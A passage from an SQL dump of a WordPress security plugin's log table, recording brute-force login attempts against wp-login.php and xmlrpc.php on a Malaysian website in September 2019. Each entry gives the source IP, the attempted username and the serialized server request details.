\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568827303.0737\";s:12:\"REQUEST_TIME\";s:10:\"1568827303\";}}','notice','2019-09-18 17:21:45','2019-09-18 17:21:43',18257816,19555168,'https://bintara.com.my/xmlrpc.php',1,0,'47.91.229.187'),(25116,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"47.91.229.187\";s:11:\"REMOTE_PORT\";s:5:\"57534\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJnpCoT36h4YaCzO-AVFAAAAZQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568827300.4697\";s:12:\"REQUEST_TIME\";s:10:\"1568827300\";}}','notice','2019-09-18 17:21:41','2019-09-18 17:21:40',17741512,19232624,'https://bintara.com.my/wp-login.php',1,0,'47.91.229.187'),(25115,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"88.218.28.105\";s:11:\"REMOTE_PORT\";s:5:\"39525\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJl6yoT36h4YaCzO-AUMgAAAY0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568826860.8579\";s:12:\"REQUEST_TIME\";s:10:\"1568826860\";}}','notice','2019-09-18 17:14:22','2019-09-18 17:14:21',18258560,19554184,'https://bintara.com.my/xmlrpc.php',1,0,'88.218.28.105'),(25114,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"88.218.28.105\";s:11:\"REMOTE_PORT\";s:5:\"39134\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJl6DYpjlmVadK6PeHBlQAAAMo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568826856.8033\";s:12:\"REQUEST_TIME\";s:10:\"1568826856\";}}','notice','2019-09-18 17:14:18','2019-09-18 17:14:17',17742072,19231736,'https://bintara.com.my/wp-login.php',1,0,'88.218.28.105'),(25113,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"13.67.183.43\";s:11:\"REMOTE_PORT\";s:5:\"51084\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJiSHcOb4UlVF5wccEJcwAAAcY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568825928.5099\";s:12:\"REQUEST_TIME\";s:10:\"1568825928\";}}','notice','2019-09-18 16:58:50','2019-09-18 16:58:48',18258056,19554472,'https://bintara.com.my/xmlrpc.php',1,0,'13.67.183.43'),(25112,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"13.67.183.43\";s:11:\"REMOTE_PORT\";s:5:\"50284\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJiRVlvzIDnRn6zOHUMqAAAAJQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568825925.6776\";s:12:\"REQUEST_TIME\";s:10:\"1568825925\";}}','notice','2019-09-18 16:58:46','2019-09-18 16:58:46',17742392,19235008,'https://bintara.com.my/wp-login.php',1,0,'13.67.183.43'),(25111,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"128.199.175.6\";s:11:\"REMOTE_PORT\";s:5:\"59152\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJg1DYpjlmVadK6PeG-ngAAAMo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568825556.5775\";s:12:\"REQUEST_TIME\";s:10:\"1568825556\";}}','notice','2019-09-18 16:52:37','2019-09-18 16:52:36',18258600,19554184,'https://bintara.com.my/xmlrpc.php',1,0,'128.199.175.6'),(25110,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"128.199.175.6\";s:11:\"REMOTE_PORT\";s:5:\"58802\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJg0ioT36h4YaCzO-ASNwAAAYY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568825554.397\";s:12:\"REQUEST_TIME\";s:10:\"1568825554\";}}','notice','2019-09-18 16:52:35','2019-09-18 16:52:34',17742040,19231680,'https://bintara.com.my/wp-login.php',1,0,'128.199.175.6'),(25109,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"74.201.172.148\";s:11:\"REMOTE_PORT\";s:5:\"55700\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJeuXcOb4UlVF5wccEGpQAAAdg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568825017.2421\";s:12:\"REQUEST_TIME\";s:10:\"1568825017\";}}','notice','2019-09-18 16:43:38','2019-09-18 16:43:37',18257592,19553952,'https://bintara.com.my/xmlrpc.php',1,0,'74.201.172.148'),(25108,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"74.201.172.148\";s:11:\"REMOTE_PORT\";s:5:\"54272\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJetMrWzCkhZpjT3iO2pgAAAUc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568825012.8923\";s:12:\"REQUEST_TIME\";s:10:\"1568825012\";}}','notice','2019-09-18 16:43:35','2019-09-18 